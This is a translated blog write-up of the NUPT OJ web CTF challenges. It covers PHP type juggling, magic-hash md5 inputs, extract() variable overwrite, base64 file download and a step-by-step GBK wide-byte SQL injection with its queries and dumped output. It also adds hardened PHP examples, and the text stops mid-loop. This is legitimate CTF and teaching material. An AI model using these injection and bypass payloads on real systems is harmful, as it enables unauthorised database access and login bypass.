
[NUPT OJ] Web

2018-01-31  This post has reached 286 readers  JasonChiu17

Sign-in 2

Link: Source: Network Attack and Defense Competition


This one isn't Web

Really, you have to believe me! This one isn't Web.
Portal: challenge link.


Layer by layer

A challenge by hacker uncle p0tt1
Everyone is welcome to follow his Weibo~
Challenge portal: http://chinalover.sinaapp.com/web3/ (from the view-source dump below)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>SuperSo | by:p0tt1</title>
<meta name="keywords" content="SuperSo | by:p0tt1">
<meta name="Description" content="SuperSo | by:p0tt1" />
<!-- css,js -->
<style type="text/css">
*{margin:0;padding:0;}
body{background:#FFFFFF;font-size:12px;font-family:"微软雅黑";#666}

.course{width:1024px;height:680px;margin:30px auto;}
.course .course_box{width:255px;height:155px;background:#FFCC66;float:left;margin-left:1px;
    cursor:pointer;margin-bottom:20px;color:#fff;position:relative;
}
.course .course_box h3{font-size:24px;font-weight:300;text-align:center;margin-top:63px;}
.course .course_box p{width:255px;height:155px;position:absolute;left:0;top:0;padding:10px;background:#000;opacity:0.5;
                        filter:alpha(opacity=50);display:none;  
}
.course .course_box p span{display:block;margin-top:2px;padding:2px;}
.course .course_box p .course_title{font-size:22px;}
.course .tz_blue{background:#2d8af1;}
.course .tz_red{background:#D44825;}
.course .tz_gray{background:#666;}
.course .tz_org{background:#ff6e1a;}
.course .tz_lv{background:#0cc5e7;}
.course .tz_qing{background:#64d500;}
.course .tz_yellow{background:#d5c300;} 
.course .tz_blue{background:#2d8af1;}
.course .tz_bluees{background:#2a45f1;}
.course .tz_redd{background:#D44835;}
.course .tz_grayy{background:black;}
.course .tz_orgg{background:#ff6e4a;}
.course .tz_lvv{background:#0cc5a7;}
.course .tz_qingg{background:#64c500;}
.course .tz_yelloww{background:#d45300;}
.course .tz_bluee{background:#2ddff1;} 
</style>
<link href="css/animate.min.css" rel="stylesheet" type="text/css">
</link>
</head>
<body>
<body style="overflow:auto;">
<iframe runat="server" src="SO.html" width="100%" height="237" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>
<iframe runat="server" src="http://www.lunzhiyu.com" width="100%" height="3800" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>
</body>
</html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>有人偷偷先做题,哈哈飞了吧?</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY>
<center>
<TABLE width=500 border=0 cellspacing=10><TR><TD>
<!-- Placed at the end of the document so the pages load faster -->
<!--
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->
<p>来来来,听我讲个故事:</p>
<ul>
<li>从前,我是一个好女孩,我喜欢上了一个男孩小A。</li>
<li>有一天,我终于决定要和他表白了!话到嘴边,鼓起勇气... </li>
<li>可是我却又害怕的<a href="javascript:history.back(1)">后退</a>了。。。</li>
</ul>
<h2>为什么?
<br>为什么我这么懦弱?</h2>
<hr>
<p>最后,他居然向我表白了,好开森...说只要骗足够多的笨蛋来这里听这个蠢故事浪费时间,</p>
<p>他就同意和我交往!</p>
<p>谢谢你给出的一份支持!哇哈哈\(^o^)/~!</p>
</TD></TR></TABLE>
</center>
</BODY></HTML>

Single for twenty years

This one can be done with skill or with hand speed!
I have been single for twenty years, so naturally I rely on hand speed!
Challenge link: http://chinalover.sinaapp.com/web8/ (from the view-source dump below)

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body>
<a href="./search_key.php">_到这里找key__</a>
</body>
</html>
<script>window.location="./no_key_is_here_forever.php"; </script>
key is : nctf{yougotit_script_now}

Comprehensive challenge

Challenge link: tip: bash

1bc29b36f623ba82aaf6724fd3b16718.php
zip -r flagbak.zip ./*
flag is:nctf{bash_history_means_what}

pass check

Core source

<?php
$pass=@$_POST['pass'];
$pass1=***********;//the hidden password
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

Portal: challenge link

Build the POST parameter as pass[]=123
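Why pass[]=123 gets past `@!strcmp($pass,$pass1)`, and what the check should look like instead. This is an added example written for this post, not the challenge's own code; HIDDEN_PASS is a constructed placeholder for the redacted $pass1, and the request bodies are made up.

```php
<?php
// Added example, not the challenge's own code: why "@!strcmp($pass, $pass1)"
// accepts an array, and a check that does not.  HIDDEN_PASS is a constructed
// placeholder standing in for the redacted $pass1.
const HIDDEN_PASS = 'placeholder-secret';

// Pattern from the challenge.  strcmp() expects two strings; handed an array
// it emits a warning (hidden by @) and returns NULL on PHP 7, and !NULL is
// true, so the comparison "succeeds" without the password.  PHP 8 throws a
// TypeError instead, which @ cannot suppress.
function vulnerable_check($pass): bool
{
    try {
        return @!strcmp($pass, HIDDEN_PASS);
    } catch (TypeError $e) {
        return false;
    }
}

// Hardened: refuse anything that is not a string before comparing, then
// compare in constant time so the length of the matching prefix is not leaked.
function hardened_check($pass): bool
{
    if (!is_string($pass)) {
        return false;
    }
    return hash_equals(HIDDEN_PASS, $pass);
}

// Constructed request bodies: a wrong guess, the right one, and the array
// form this post sends (pass[]=123 arrives in $_POST as ['123']).
$cases = [
    'wrong string'   => 'guess',
    'right string'   => HIDDEN_PASS,
    'array (pass[])' => ['123'],
];
foreach ($cases as $label => $pass) {
    printf("%-16s vulnerable=%-5s hardened=%s\n",
        $label,
        vulnerable_check($pass) ? 'true' : 'false',
        hardened_check($pass) ? 'true' : 'false');
}
// On PHP 7 the last line reads vulnerable=true hardened=false; on PHP 8 the
// TypeError makes vulnerable=false as well, but only because strcmp() now
// refuses the array, not because the code checks for it.
```

The is_string() guard is the fix; hash_equals() on top of it is the idiomatic way to compare a user-supplied string against a fixed secret.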



Header

Header!! Header!!!
Portal: click me


File inclusion

That's right, this is the legendary LFI
Portal: click me and I'll take you flying
TIPS: http://drops.wooyun.org/tips/3827


Single for a hundred years won't help either

Yes... for this one, being single for a hundred years won't help either
Portal: biu~


Download~!

Download whatever you like, just not the music. No kidding, try downloading something else
True · Ultimate · Portal: http://way.nuptzj.cn/web6/ (from the view-source dump below)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Game 19</title>
<link href="templatemo_style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="templatemo_container">
<div id="templatemo_header">
<div id="website_title">
</div>
</div>
<div id="templatemo_menu">
<ul>
<li><a href="#" class="current">Tips</a></li>
<li><b>down</b></li>
</ul>
</div>
<div id="templatemo_content_wrapper">
<div id="templatemo_content">
<div class="content_title_01">听会歌吧</div>
<div class="horizontal_divider_01">&nbsp;</div>
<div class="cleaner">&nbsp;</div>
<p>为了让大家更轻松的比赛,为大家准备了两首歌让大家下载</p>
<p><a href="download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=" target="_blank">星星点灯</a></p>
<p><a href="download.php?url=YnV4aWFuZ3poYW5nZGEubXAz" target="_blank">不想长大</a></p>
<div class="cleaner">&nbsp;</div>
</div>
<div class="cleaner">&nbsp;</div>
</div>
<div id="templatemo_footer">
</div>
</div>
</body>
</html>
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET['url']);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
    $file_size = filesize($url);
    header ( "Pragma: public" );
    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
    header ( "Cache-Control: private", false );
    header ( "Content-Transfer-Encoding: binary" );
    header ( "Content-Type:audio/mpeg MP3");
    header ( "Content-Length: " . $file_size);
    header ( "Content-Disposition: attachment; filename=".$url);
    echo(file_get_contents($url));
    exit;
}
else {
    echo "Access Forbidden!";
}
?>
<?php
//flag:nctf{download_any_file_666}
?>

COOKIE

COOKIE means a sweet biscuit~
Link: portal

TIP:
0==not



MYSQL

Not every challenge can be this easy
Right?
Challenge link

Don't get too excited, the flag isn't here. Have you worked out what this file is for?
In CTF competitions, this file often holds hint information.

TIP:sql.php

<?php
if($_GET['id']) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $id = intval($_GET['id']);
  $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
  if ($_GET['id']==1024) {
      echo "<p>no! try again</p>";
  }
  else{
    echo($query['content']);
  }
}
?>
the flag is:nctf{query_in_mysql}

md5 collision

Source

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
?>

Portal: challenge link

please input a
s878926199a   0e545993274517709034328855841020
s155964671a   0e342768416822451524974117254469
s214587387a   0e848240448830537924465865611904
s1091221200a  0e940624217856561557816327384675
s1885207154a  0e509367213418206700842008763514
s1502113478a  0e861580163291561247404381396064
s1836677006a  0e481036490867661113260034900752
s1184209335a  0e072485820392773389523109082030
s1665632922a  0e731198061491163073197128363787
s532378020a   0e220463095855511507588041205815
nctf{md5_collision_is_easy}

bypass again

Link: still weak typing

Source: hctf

if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}
Flag: nctf{php_is_so_cool}
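What `==` actually does with the md5 values in the list above, for both "md5 collision" and "bypass again". This is an added example written for this post, not the challenge's code; the two inputs (QNKCDZO and s878926199a) are taken from the sections above.

```php
<?php
// Added example, not the challenge's own code: what == does with the md5()
// values listed above, next to comparisons that keep them as strings.

const SECRET = 'QNKCDZO';        // the fixed side in "md5 collision"
const INPUT  = 's878926199a';    // one of the inputs from the list above

// Pattern from "md5 collision" and "bypass again": loose comparison.
function loose_equal(string $x, string $y): bool
{
    return md5($x) == md5($y);
}

// Hardened: hash_equals() compares byte by byte, never as numbers, and in
// constant time.  A plain === would also stop the type juggling.
function strict_equal(string $x, string $y): bool
{
    return hash_equals(md5($x), md5($y));
}

function demo(): array
{
    return [
        'md5(SECRET)'     => md5(SECRET),                 // 0e830400451993494058024219903391
        'md5(INPUT)'      => md5(INPUT),                  // 0e545993274517709034328855841020
        'SECRET != INPUT' => SECRET != INPUT,             // true: the challenge's first check passes
        'loose_equal'     => loose_equal(SECRET, INPUT),  // true: "0e830..." == "0e545..." is 0.0 == 0.0
        'strict_equal'    => strict_equal(SECRET, INPUT), // false
        // The same juggling on bare numeric strings:
        '"0e1" == "0e2"'  => "0e1" == "0e2",              // true
        '"0e1" === "0e2"' => "0e1" === "0e2",             // false
    ];
}

foreach (demo() as $label => $value) {
    printf("%-16s %s\n", $label, is_bool($value) ? var_export($value, true) : $value);
}
```

Both md5 outputs are strings of the form "0e" followed only by digits, so `==` parses each side as a float in scientific notation and compares 0.0 with 0.0. This is still true on PHP 8: the change there affected string-versus-number comparisons, not numeric-string-versus-numeric-string.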

PHP is the best language in the world

I hear PHP is the best language in the world
Link: challenge link

<?php
if(eregi("hackerDJ",$_GET['id'])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


Can you authenticate to this website?
Access granted!

flag: nctf{php_is_best_language}


Can you authenticate to this website? index.txt

SQL injection 1

I hear you can do injection too?
Link: challenge link

<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST['user'] && $_POST['pass']) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST['user']);
  $pass = md5(trim($_POST['pass']));
  $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
  echo '</br>'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query['user']=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query['user'] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query['user'];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
SQLstr = "select    *    from abc_table where user_name = ' " . $user_name . " ' ";
can be rewritten as
SQLstr = "select    *    from abc_table where user_name = ' $user_name ' ";

/x00

Challenge link: this one has several solutions, how many can you think of?

view-source:

    if (isset ($_GET['nctf'])) {
        if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
            echo '必须输入数字才行';
        else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
            die('Flag: '.$flag);
        else
            echo '骚年,继续努力吧啊~';
    }

Variable overwrite

Heard of variable overwriting?
Link: challenge link

<?php
include("secret.php");
?>
<html>
    <head>
        <title>The Ducks</title>
        <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
    </head>
    <body>
        <div class="container">
            <div class="jumbotron">
                <center>
                    <h1>The Ducks</h1>
                    <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?></code>
                            </div>
                        <?php } ?>
                    <?php } ?>
                    <form action="." method="POST">
                        <div class="row">
                            <div class="col-md-6 col-md-offset-3">
                                <div class="row">
                                    <div class="col-md-9">
                                        <input type="password" class="form-control" name="pass" placeholder="Password" />
                                    </div>
                                    <div class="col-md-3">
                                        <input type="submit" class="btn btn-primary" value="Submit" />
                                    </div>
                                </div>
                            </div>
                        </div>
                    </form>
                </center>
            </div>
            <p>
                <center>
                    source at <a href="source.php" target="_blank">/source.php</a>
                </center>
            </p>
        </div>
    </body>
</html> 
 <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?>
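How `extract($_POST)` lets the request replace `$thepassword_123`, and the two ways to close that off. This is an added example written for this post, not the challenge's code; the secret, the include of secret.php and the request bodies are all simulated.

```php
<?php
// Added example, not the challenge's own code: how extract($_POST) lets a
// request overwrite a server-side variable, and two ways to stop it.
// secret.php is simulated by the assignment at the top of each function.

// The challenge's pattern.  extract() defaults to EXTR_OVERWRITE, so a POST
// field called thepassword_123 replaces the value that came from secret.php.
function check_vulnerable(array $post): bool
{
    $thepassword_123 = 'server-side-secret';   // stands in for include("secret.php")
    extract($post);
    return ($pass ?? null) == $thepassword_123;
}

// Fix 1: EXTR_SKIP keeps every variable that already exists.
function check_extr_skip(array $post): bool
{
    $thepassword_123 = 'server-side-secret';
    extract($post, EXTR_SKIP);
    return ($pass ?? null) === $thepassword_123;
}

// Fix 2 (preferred): never turn request keys into variables at all.
function check_explicit(array $post): bool
{
    $thepassword_123 = 'server-side-secret';
    $pass = $post['pass'] ?? null;
    return is_string($pass) && hash_equals($thepassword_123, $pass);
}

// Constructed request bodies.
$requests = [
    'honest'    => ['pass' => 'wrong'],
    'overwrite' => ['pass' => 'x', 'thepassword_123' => 'x'],   // both values chosen by the client
    'correct'   => ['pass' => 'server-side-secret'],
];
foreach ($requests as $name => $post) {
    printf("%-9s vulnerable=%-5s extr_skip=%-5s explicit=%s\n", $name,
        var_export(check_vulnerable($post), true),
        var_export(check_extr_skip($post), true),
        var_export(check_explicit($post), true));
}
// honest    vulnerable=false extr_skip=false explicit=false
// overwrite vulnerable=true  extr_skip=false explicit=false
// correct   vulnerable=true  extr_skip=true  explicit=true
```

EXTR_SKIP only protects variables that exist before the call, so it is easy to defeat by reordering code; reading `$post['pass']` by name removes the problem rather than guarding against it.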

Upload bypass

Challenge link: guess how the code is written

1. filename=1.png
2. uppath=/uploads/1.png

1. filename=download.php
2. uppath=/uploads/download.php

1. filename
2. upload path: /uploads/

1. filename=download.jpg
2. uppath=/uploads/dowload.phpdownload.jpg
3. upfilename=path & filename
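The attempts above all revolve around the server trusting the client's filename. As an added example written for this post (not the challenge's code), this is what an upload handler looks like when it chooses the stored name itself; the allowed types, the upload directory and the test cases are constructed, and the content type is assumed to come from finfo on the uploaded bytes.

```php
<?php
// Added example, not the challenge's own code: deciding a stored file name on
// the server instead of trusting the client's "filename" field.  The allowed
// types and the upload directory are constructed for the demo.

const ALLOWED_EXT = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];

// Returns the server-chosen relative path, or null when the upload is refused.
// $clientName is what the browser sent; $mimeFromContent is what finfo
// reported from the bytes, because the extension alone is a client claim.
function stored_upload_path(string $clientName, string $mimeFromContent, string $dir = '/uploads/'): ?string
{
    // Truncation tricks need a NUL byte; a path separator means a directory escape.
    if (strpbrk($clientName, "\0/\\") !== false) {
        return null;
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_EXT[$ext]) || ALLOWED_EXT[$ext] !== $mimeFromContent) {
        return null;            // extension not allowed, or bytes do not match it
    }
    // The client name never reaches the disk: random name + allowlisted extension.
    return $dir . bin2hex(random_bytes(8)) . '.' . $ext;
}

// Constructed cases mirroring the attempts above.
$cases = [
    ['1.png',        'image/png'],
    ['download.php', 'text/x-php'],
    ['download.jpg', 'text/x-php'],     // renamed script: the content check rejects it
    ['photo.jpg',    'image/jpeg'],
];
foreach ($cases as [$name, $mime]) {
    printf("%-14s %-11s -> %s\n", $name, $mime, stored_upload_path($name, $mime) ?? 'rejected');
}
// 1.png          image/png   -> /uploads/<16 hex chars>.png
// download.php   text/x-php  -> rejected
// download.jpg   text/x-php  -> rejected
// photo.jpg      image/jpeg  -> /uploads/<16 hex chars>.jpg
```

Storing under a random name with an allowlisted extension also removes the "path & filename" concatenation the last attempt probes, since nothing from the request is ever joined onto the path.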

Naming things is hard

Link: the code is as follows

<?php
function noother_says_correct($number)
{
    $one = ord('1');
    $nine = ord('9');
    for ($i = 0; $i < strlen($number); $i++)
    {
        $digit = ord($number[$i]);   // the original used $number{$i}, a curly-brace offset syntax removed in PHP 8
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            return false;
        }
    }
    return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
    echo $flag;
else
    echo 'access denied';
?>


sql injection 3

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

1. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1'
your sql:select id,title from news where id = '1\''
Hello World!OVO

2. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'
your sql:select id,title from news where id = '1運''

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

3. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -
your sql:select id,title from news where id = '1運' and 1=1 -- -'
Hello World!OVO

4. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -
your sql:select id,title from news where id = '1運' and 1=2 -- -'

5. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2 -- -
your sql:select id,title from news where id = '1運' order by 2 -- -'
Hello World!OVO

6. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,2 -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,2 -- -'
2

7. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -'
sae-chinalover@220.181.129.119|sae-chinalover|5.5.52-0ubuntu0.14.04.1

8. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sae-chinalover'-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=\'sae-chinalover\'-- -'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

The single quotes got escaped.

9. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -

sae-chinalover in hex is 0x7361652d6368696e616c6f766572; the hex form gets around the quote escaping.

your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -'
ctf,ctf2,ctf3,ctf4,news

10. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -'
id,content

11. http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(id,content) from ctf2-- -'
1020no msg in 1020,1021no msg in 1021 too,1022no msg in 1022,1023no msg in 1023~~~,1024the flag is:nctf{query_in_mysql},1025no more
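Why step 2 turns `1%df'` into `'1運''`: the escaping works on bytes, but the server decodes the statement as GBK, where DF 5C is one character. This is an added example written for this post, not the challenge's code; the input bytes are constructed from the id=1%df' request above, and it needs the mbstring extension (PHP 7.4+ for mb_str_split).

```php
<?php
// Added example, not the challenge's own code: why a byte-oriented escape
// leaves a bare quote behind once the server decodes the bytes as GBK.

// Byte-oriented escaping: what addslashes() does, and what
// mysql_real_escape_string() does when no client charset has been set.
function escape_bytewise(string $s): string
{
    return addslashes($s);
}

// Walk the escaped text as the SQL parser would under $charset and count the
// single quotes that are not preceded by a backslash *character*.
function bare_quotes(string $escaped, string $charset): int
{
    $chars = mb_str_split($escaped, 1, $charset);
    $n = 0;
    for ($i = 0, $len = count($chars); $i < $len; $i++) {
        if ($chars[$i] === '\\') {   // a backslash consumes the next character
            $i++;
            continue;
        }
        if ($chars[$i] === "'") {
            $n++;
        }
    }
    return $n;
}

// Constructed input: the id=1%df' request decoded, i.e. the bytes 31 DF 27.
$input   = "1\xdf'";
$escaped = escape_bytewise($input);                                // bytes 31 DF 5C 27

printf("escaped bytes:        %s\n", bin2hex($escaped));            // 31df5c27
// Seen as single bytes ('8bit'), the backslash protects the quote.
printf("bare quotes as bytes: %d\n", bare_quotes($escaped, '8bit')); // 0
// Seen as GBK, DF 5C is one two-byte character (運) and the quote stands alone.
printf("bare quotes as GBK:   %d\n", bare_quotes($escaped, 'GBK'));  // 1
printf("GBK view:             %s\n", mb_convert_encoding($escaped, 'UTF-8', 'GBK')); // 1運'
```

The fix is to make the escaping layer aware of the connection charset, by setting it through the client API (mysql_set_charset() on the old extension, `charset=` in the PDO DSN) rather than with a SET NAMES query, so that the escaper and the server agree on where characters begin and end; binding parameters avoids the question altogether.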

Password reset

Reset the password of the administrator account: admin

After clicking "forgot password", your mailbox received a password reset email like this:

Click this link to reset your password


sql injection 4

Keep injecting~
Challenge link

TIP: a backslash can be used to escape
Look carefully at how the relevant functions behave

<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;
-->
Invalid password!

Where are you from

Did you come from google?
Portal: challenge link

<?php
$referer = $_SERVER['referer'];
if ($referer === "https://www.google.com/ " || $referer === "https://www.google.com"){
    echo "nctf{http_referer}";
}else{
    echo "are you from google?";
}
?>

AAencode

javascript aaencode

Portal: challenge link


php deserialization

http://115.28.150.176/php1/index.php
Code:

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>


SQL injection 2

Second injection challenge~~ mainly tests union queries
Portal: click me and I'll take you flying

<html>
<head>
Secure Web Login II
</head>
<body>

<?php
if($_POST['user'] && $_POST['pass']) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST['user'];
  $pass = md5($_POST['pass']);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query['pw']) && (!strcasecmp($pass, $query['pw']))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>


<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
1. $pass = md5($_POST['pass']);
2. $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
3. strcasecmp(): returns 0 when the two strings are equal.

1. "and 0=1" makes the preceding select pw from ctf where user='$user' false, so it returns nothing.
2. The whole statement then hands md5(123) back as $query.
3. That sidesteps the database lookup: we assign $query ourselves.
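The same login, for both SQL injection 1 and SQL injection 2, written so that the user name travels as data and the stored password is a slow salted hash rather than an md5 that a UNION can supply. This is an added example written for this post, not the challenge's code; it uses an in-memory SQLite database (pdo_sqlite, PHP 7.4+) so it runs stand-alone, and the admin row and the login attempts are constructed.

```php
<?php
// Added example, not the challenge's own code: the ctf login rewritten with a
// bound parameter and password_verify().  In-memory SQLite stands in for the
// MySQL database; the user row is constructed.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE ctf (user TEXT PRIMARY KEY, pw TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO ctf (user, pw) VALUES (:u, :p)');
    // A salted, slow hash instead of md5(): nothing a query can be made to
    // return (such as md5(123)) will ever compare equal to it.
    $ins->execute([':u' => 'admin', ':p' => password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

// Dummy hash used when the user does not exist, so response time does not
// reveal which user names are valid.
function dummy_hash(): string
{
    static $h = null;
    return $h ??= password_hash('dummy', PASSWORD_DEFAULT);
}

function login(PDO $db, string $user, string $pass): bool
{
    // The SQL text is fixed; quotes, comments and UNION inside $user are just
    // characters of the value being looked up.
    $stmt = $db->prepare('SELECT pw FROM ctf WHERE user = :u');
    $stmt->execute([':u' => $user]);
    $row  = $stmt->fetch(PDO::FETCH_ASSOC);
    $hash = $row ? $row['pw'] : dummy_hash();
    return password_verify($pass, $hash) && $row !== false;
}

$db = make_db();
$attempts = [                                              // constructed
    ['admin', 'correct horse'],
    ['admin', '123'],
    ["admin' and 0=1 union select md5(123) -- -", '123'],  // the idea from the notes above, now inert
    ['nobody', 'anything'],
];
foreach ($attempts as [$u, $p]) {
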